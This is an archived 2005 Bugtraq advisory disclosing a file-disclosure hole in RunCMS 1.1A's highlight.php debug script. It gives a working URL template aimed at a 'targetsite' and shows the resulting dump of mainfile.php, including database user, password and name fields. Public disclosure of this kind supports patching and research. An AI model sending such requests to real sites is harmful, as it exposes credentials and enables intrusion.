lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <E1DCJCd-000FiC-VO@hossein.emami.bistgani> Date: Fri, 18 Mar 2005 10:15:55 -0500 From: "Majid NT" <NT@...team.com> To: bugtraq@...urityfocus.com Subject: runcms highlight.php hole ******************************************** IHS Iran Hackers Sabotage Public advisory by : NT NT@...team.com ******************************************** If You Have RUNCMS Installation Address You Can Use highligh.php Hole And Get DataBase Configuration(Name,User,Password) Tested In RUNCMS 1.1A ------------------------------------------- Input This Line To Your Browser AddressBar : http://targetsite/runcmsinstalation/class/debug/highlight.php? file=runcmsinstallationpath\mainfile.php&line=151#151 Like This : http://localhost/runcms/class/debug/highlight.php? file=c:\phpdev\www\runcms\mainfile.php&line=151#151 You See This Result : 1 <?php 2 // ------------------------------------------------------------------- ------ // 3 // E-Xoops: Content Management for the Masses // 4 // < http://www.e-xoops.com > // 5 // ------------------------------------------------------------------- ------ // 6 7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) { 8 define('XOOPS_MAINFILE_INCLUDED', 1); 9 10 // Physical Path 11 // Physical path to your main RUNCMS directory WITHOUT trailing slash. ( On windows use simple forward slashes & be sure to include the drive letter. c:/myfolder ) 12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1'); 13 14 // Virtual Path (URL) 15 // Virtual path to your main RUNCMS directory WITHOUT trailing slash. ( http://www.mysite.com/myfolder ) 16 define('XOOPS_URL', 'http://localhost/runcms1.1'); 17 18 // Database 19 // Choose the type of database to be used. 20 $xoopsConfig['database'] = 'mysql'; 21 22 // Table Prefix 23 // This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'runcms'. 24 $xoopsConfig['prefix'] = 'runcms'; 25 26 // Database Hostname 27 // Hostname of the database server. ( If you are unsure, 'localhost' works in most cases. ) 28 $xoopsConfig['dbhost'] = 'localhost'; 29 30 // Database Username 31 // Your database user account on the host. ( Often root when installed on your local machine. ) 32 $xoopsConfig['dbuname'] = 'root'; 33 34 // Database Password 35 // Password for your database user account. 36 $xoopsConfig['dbpass'] = ''; 37 38 // Database Name 39 // The name of database on the host. The installer will attempt to create the database if not exist. 40 $xoopsConfig['dbname'] = 'aaa'; 41 42 // Use persistent connection? (Yes=1 No=0) 43 // Default is 'No'. Choose 'No' if you are unsure. 44 $xoopsConfig['db_pconnect'] = 0; 45 46 // Default setup language. 47 $xoopsConfig['default_language'] = 'english'; 48 49 include_once(XOOPS_ROOT_PATH.'/include/common.php'); 50 } ?> ------------------------------------------ More Information See: http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12 Source Advisory : http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14 Found By NT(IHS) NT@...Team.com Greet To Lord And C0d3r From IHS. www.IHSTeam.com -- www.IHSTEAM.com www.IHSSECURITY.com
Powered by blists - more mailing lists